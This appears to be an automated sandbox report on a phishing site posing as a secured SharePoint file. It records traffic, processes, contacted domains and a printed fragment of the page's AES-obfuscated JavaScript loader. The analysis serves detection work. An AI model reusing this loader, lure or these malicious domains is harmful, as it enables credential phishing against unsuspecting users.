Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
http://toungeassociates-sharepoint.com

Overview

General Information

Sample URL:http://toungeassociates-sharepoint.com
Analysis ID:1541684
Infos:

Detection

HTMLPhisher
Score:56
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Yara detected HtmlPhish70
AI detected landing page (webpage, office document or email)
Phishing site or detected (based on various text indicators)
HTML page contains hidden javascript code
Stores files to the Windows start menu directory
Uses Javascript AES encryption / decryption (likely to hide suspicious Javascript code)

Classification

  • System is w10x64_ra
  • chrome.exe (PID: 6296 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 6784 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2204 --field-trial-handle=1992,i,8553306871137071576,15438942175306158524,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 7116 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5772 --field-trial-handle=1992,i,8553306871137071576,15438942175306158524,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6532 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://toungeassociates-sharepoint.com" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
SourceRuleDescriptionAuthorStrings
dropped/chromecache_212JoeSecurity_HtmlPhish_70Yara detected HtmlPhish_70Joe Security
    No Sigma rule has matched
    No Suricata rule has matched

    Click to jump to signature section

    Show All Signature Results

    Phishing

    barindex
    Source: Yara matchFile source: dropped/chromecache_212, type: DROPPED
    Source: Chrome DOM: 2.2OCR Text: TOUNGE ASSOCIATES TOUNGE ASSOCIATES You are accessing a secured SharePoint file REVIEW COMPLETED DOCUMENTS
    Source: https://toungeassociates.pages.dev/HTTP Parser: Base64 decoded: {"a":"b6f4LMlGogO3+EJUIY3pVmMdwv7vepHUNbIiBkC4L\/Y=","c":"fe8572d91200b0110ebf0397dcd2c1c1","b":"ee7d7d7fa4f2895de846140d38633339e6aa983d8b62193c078745be107bbff1ca4f2172684b6e4f32355be4255473fd175161014795db1852aaccbea746f5c263a56c3a93b505bab7f6d1b9929bff...
    Source: https://toungeassociates.pages.dev/HTTP Parser: async functionnaive(karmic) {var{a,b,c,d} =json.parse(karmic);return cryptojs.aes.decrypt(a, cryptojs.pbkdf2(cryptojs.enc.hex.parse(d), cryptojs.enc.hex.parse(b), {hasher: cryptojs.algo.sha512,keysize:64/8, iterations:999}), {iv:cryptojs.enc.hex.parse(c)}).tostring(cryptojs.enc.utf8); } asyncfunction cabal(){iamb.hidden = 0;qualify.hidden= 1; document.write(await naive(await (await fetch(await naive(atob(`eyjhijoiyjzmnexnbedvz08zk0vkvulzm3bwbu1kd3y3dmvwsfvoyklpqmtdnexcl1k9iiwiyyi6imzlodu3mmq5mtiwmgiwmtewzwjmmdm5n2rjzdjjmwmxiiwiyii6imvln2q3zddmytrmmjg5nwrlodq2mtqwzdm4njmzmzm5ztzhytk4m2q4yjyymtkzyza3odc0nwjlmta3ymjmzjfjytrmmje3mjy4ngi2ztrmmzizntviztqyntu0nznmzde3nte2mtaxndc5nwrimtg1mmfhy2nizwe3ndzmnwmynjnhntzjm2e5m2i1mdviywi3zjzkmwi5oti5ymzmmwnhoduxmtzlntkwnmewzmfiymuxmmuzzdiyotaxzmuzmdvkmgrjzmnmnde2ztlimmjintvhnza5odazmjywytvimdizzjvln2rjzduxmji5zdvkmzbmzdc3ntvmothkndfkmzhkowmwmze4ymmyyznhndiwzgfmn2i5ymmzndllyzu0njbmy2mzzwqynda3otmwmzk0mdexyjuwmzz...
    Source: https://toungeassociates.pages.dev/HTTP Parser: No favicon
    Source: https://toungeassociates.pages.dev/HTTP Parser: No favicon
    Source: https://trendlifetechdo.ru//#servicesHTTP Parser: No favicon
    Source: https://toungeassociates.pages.dev/HTTP Parser: No favicon
    Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49730 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49742 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.16:49781 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.16:49784 version: TLS 1.2
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 184.28.90.27
    Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
    Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
    Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
    Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
    Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
    Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
    Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
    Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
    Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: toungeassociates-sharepoint.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
    Source: global trafficDNS traffic detected: DNS query: toungeassociates-sharepoint.com
    Source: global trafficDNS traffic detected: DNS query: img1.wsimg.com
    Source: global trafficDNS traffic detected: DNS query: isteam.wsimg.com
    Source: global trafficDNS traffic detected: DNS query: websites.godaddy.com
    Source: global trafficDNS traffic detected: DNS query: www.google.com
    Source: global trafficDNS traffic detected: DNS query: toungeassociates.pages.dev
    Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
    Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
    Source: global trafficDNS traffic detected: DNS query: trendlifetechdo.ru
    Source: global trafficDNS traffic detected: DNS query: cdn.jsdelivr.net
    Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
    Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
    Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
    Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
    Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
    Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
    Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
    Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
    Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
    Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
    Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
    Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
    Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
    Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
    Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
    Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
    Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
    Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
    Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
    Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
    Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
    Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
    Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
    Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
    Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49730 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49742 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.16:49781 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.16:49784 version: TLS 1.2
    Source: classification engineClassification label: mal56.phis.win@27/66@48/241
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
    Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2204 --field-trial-handle=1992,i,8553306871137071576,15438942175306158524,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
    Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "http://toungeassociates-sharepoint.com"
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5772 --field-trial-handle=1992,i,8553306871137071576,15438942175306158524,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2204 --field-trial-handle=1992,i,8553306871137071576,15438942175306158524,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5772 --field-trial-handle=1992,i,8553306871137071576,15438942175306158524,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
    Source: Window RecorderWindow detected: More than 3 window changes detected

    Persistence and Installation Behavior

    barindex
    Source: https://toungeassociates-sharepoint.com/LLM: Page contains button: 'REVIEW COMPLETED DOCUMENTS' Source: '1.0.pages.csv'
    Source: https://toungeassociates.pages.dev/LLM: Page contains button: 'REVIEW COMPLETED DOCUMENTS' Source: '2.1.pages.csv'
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity Information1
    Scripting
    Valid AccountsWindows Management Instrumentation1
    Browser Extensions
    1
    Process Injection
    1
    Masquerading
    OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System2
    Encrypted Channel
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault AccountsScheduled Task/Job1
    Scripting
    1
    Registry Run Keys / Startup Folder
    1
    Process Injection
    LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media2
    Non-Application Layer Protocol
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAt1
    Registry Run Keys / Startup Folder
    Logon Script (Windows)1
    Deobfuscate/Decode Files or Information
    Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive3
    Application Layer Protocol
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture1
    Ingress Tool Transfer
    Traffic DuplicationData Destruction

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    No Antivirus matches
    SourceDetectionScannerLabelLink
    Chrome Cache Entry: 1480%ReversingLabs
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    NameIPActiveMaliciousAntivirus DetectionReputation
    jsdelivr.map.fastly.net
    151.101.1.229
    truefalse
      unknown
      toungeassociates-sharepoint.com
      76.223.105.230
      truefalse
        unknown
        a.nel.cloudflare.com
        35.190.80.1
        truefalse
          unknown
          toungeassociates.pages.dev
          188.114.97.3
          truefalse
            unknown
            cdnjs.cloudflare.com
            104.17.25.14
            truefalse
              unknown
              challenges.cloudflare.com
              104.18.95.41
              truefalse
                unknown
                trendlifetechdo.ru
                188.114.96.3
                truefalse
                  unknown
                  www.google.com
                  142.250.185.68
                  truefalse
                    unknown
                    isteam.wsimg.com
                    35.157.250.3
                    truefalse
                      unknown
                      img1.wsimg.com
                      unknown
                      unknownfalse
                        unknown
                        cdn.jsdelivr.net
                        unknown
                        unknownfalse
                          unknown
                          websites.godaddy.com
                          unknown
                          unknownfalse
                            unknown
                            NameMaliciousAntivirus DetectionReputation
                            https://toungeassociates.pages.dev/true
                              unknown
                              http://toungeassociates-sharepoint.com/false
                                unknown
                                https://trendlifetechdo.ru//#false
                                  unknown
                                  https://trendlifetechdo.ru//#servicesfalse
                                    unknown
                                    https://toungeassociates-sharepoint.com/true
                                      unknown
                                      • No. of IPs < 25%
                                      • 25% < No. of IPs < 50%
                                      • 50% < No. of IPs < 75%
                                      • 75% < No. of IPs
                                      IPDomainCountryFlagASNASN NameMalicious
                                      2.23.209.149
                                      unknownEuropean Union
                                      1273CWVodafoneGroupPLCEUfalse
                                      142.250.74.206
                                      unknownUnited States
                                      15169GOOGLEUSfalse
                                      76.223.105.230
                                      toungeassociates-sharepoint.comUnited States
                                      16509AMAZON-02USfalse
                                      104.18.94.41
                                      unknownUnited States
                                      13335CLOUDFLARENETUSfalse
                                      2.18.64.20
                                      unknownEuropean Union
                                      6057AdministracionNacionaldeTelecomunicacionesUYfalse
                                      142.250.185.227
                                      unknownUnited States
                                      15169GOOGLEUSfalse
                                      74.125.206.84
                                      unknownUnited States
                                      15169GOOGLEUSfalse
                                      2.23.209.182
                                      unknownEuropean Union
                                      1273CWVodafoneGroupPLCEUfalse
                                      142.250.186.131
                                      unknownUnited States
                                      15169GOOGLEUSfalse
                                      142.250.186.110
                                      unknownUnited States
